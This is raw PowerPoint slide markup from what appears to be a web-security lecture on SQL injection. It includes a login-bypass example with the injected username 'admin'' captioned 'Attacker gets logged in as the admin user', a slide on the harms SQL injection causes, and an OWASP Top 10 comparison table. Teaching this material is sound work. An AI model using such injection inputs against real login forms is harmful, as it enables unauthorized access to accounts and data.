            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>username	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="295">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="295">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>admin'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11092" y="5875423"/>
            <a:ext cx="11872595" cy="3442970"/>
            <a:chOff x="4011092" y="5875423"/>
            <a:chExt cx="11872595" cy="3442970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4011091" y="7842662"/>
              <a:ext cx="11872595" cy="408940"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11872594" h="408940">
                  <a:moveTo>
                    <a:pt x="4192447" y="283070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="188468" y="283070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188468" y="220256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="314490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188468" y="408724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188468" y="345897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192447" y="345897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4192447" y="283070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="11872594" h="408940">
                  <a:moveTo>
                    <a:pt x="11871973" y="62814"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7868018" y="62814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7868018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7679537" y="94234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7868018" y="188468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7868018" y="125641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11871973" y="125641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11871973" y="628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215037" y="5875423"/>
              <a:ext cx="3440314" cy="34428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878473" y="7350561"/>
              <a:ext cx="346795" cy="3467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875960" y="7958710"/>
              <a:ext cx="346795" cy="3467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2446082" y="8141188"/>
            <a:ext cx="2785745" cy="9829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3100" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Return the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3100" spc="-60">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3100" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>admin  user</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3100" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3100" spc="5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>profile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99811" y="8324638"/>
            <a:ext cx="3315970" cy="9829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3100" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Attacker gets</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3100" spc="-45">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3100" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>logged  in as the admin</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3100" spc="-60">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3100" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>user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887990" y="7350561"/>
            <a:ext cx="2067560" cy="344805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476884">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="565"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1450" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Username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86221" y="7950229"/>
            <a:ext cx="2067560" cy="344805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476250">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1450" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password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13970000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5"/>
              <a:t>Impact </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-300"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-270"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-409"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-1545"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-455"/>
              <a:t>Attacks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44752" y="2875032"/>
            <a:ext cx="15812135" cy="411607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560"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Unauthorized </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-390">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>access </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-470">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="4210"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="975"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-60" b="1">
                <a:solidFill>
                  <a:srgbClr val="ED7D31"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>onfidentiality </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-440">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-254">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>view </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>information, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-540">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-365">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>usernames </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-290">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>passwords</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-37719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143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-50" b="1">
                <a:solidFill>
                  <a:srgbClr val="ED7D31"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ntegrity </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-440">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-254">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>alter </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in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635">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-37719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143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-80" b="1">
                <a:solidFill>
                  <a:srgbClr val="ED7D31"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vailability </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-440">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-254">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>delete </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in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535">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
            <a:endParaRPr sz="395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spcBef>
                <a:spcPts val="1140"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-250">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>execution </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>operating</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-630">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>system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664654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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-610"/>
              <a:t>Top</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-1140"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-65"/>
              <a:t>10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77857" y="2709341"/>
          <a:ext cx="16978630" cy="7700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5670"/>
                <a:gridCol w="5260339"/>
                <a:gridCol w="5628004"/>
              </a:tblGrid>
              <a:tr h="5455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950" spc="-100" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2950" spc="-265" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Top </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2950" spc="-225" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2950" spc="-175" b="1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2950" spc="-31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950" spc="-225" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>2010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ED7D31"/>
                      </a:solidFill>
                      <a:prstDash val="soli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950" spc="-100" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2950" spc="-265" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Top </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2950" spc="-225" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2950" spc="-175" b="1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2950" spc="-31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950" spc="-225" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>2013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ED7D31"/>
                      </a:solidFill>
                      <a:prstDash val="soli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950" spc="-100" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2950" spc="-265" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Top </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2950" spc="-225" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2950" spc="-175" b="1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2950" spc="-31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950" spc="-225" b="1">
                          <a:latin typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>2017</a:t>
                      </a:r>
                      <a:endParaRPr sz="295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ED7D31"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="F4B183"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="427891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A1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24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45">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Injection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76200">
                      <a:solidFill>
                        <a:srgbClr val="ED7D31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ED7D31"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="7620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A1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24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45">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Injection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ED7D31"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="7620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A1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24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45">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Injection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ED7D31"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="76200">
                      <a:solidFill>
                        <a:srgbClr val="ED7D31"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="76200">
                      <a:solidFill>
                        <a:srgbClr val="ED7D31"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="835934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A2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204">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Cross </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-130">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Site </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-90">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Scripting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="24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305">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>(XSS)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ED7D3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104775">
                        <a:lnSpc>
                          <a:spcPct val="101000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="180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A2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125">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Broken </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-50">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Authentication </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-10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2450" spc="-180">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Session  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-90">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Management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ED7D3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A2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125">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Broken</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="245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50">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Authentication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ED7D3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9294">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="74930" marR="840105">
                        <a:lnSpc>
                          <a:spcPct val="101000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="12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A3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125">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Broken </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-50">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Authentication </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-10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2450" spc="-180">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Session  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-90">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Management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A3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160">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Cross-Site </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-90">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Scripting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="24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305">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>(XSS)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A3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120">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Sensitive </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-13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245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145">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Exposure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9294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A4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114">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Insecure </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-70">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Direct </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-80">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Object</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="245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155">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>References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A4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114">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Insecure </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-70">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Direct </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-80">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Object</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="2450" spc="-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155">
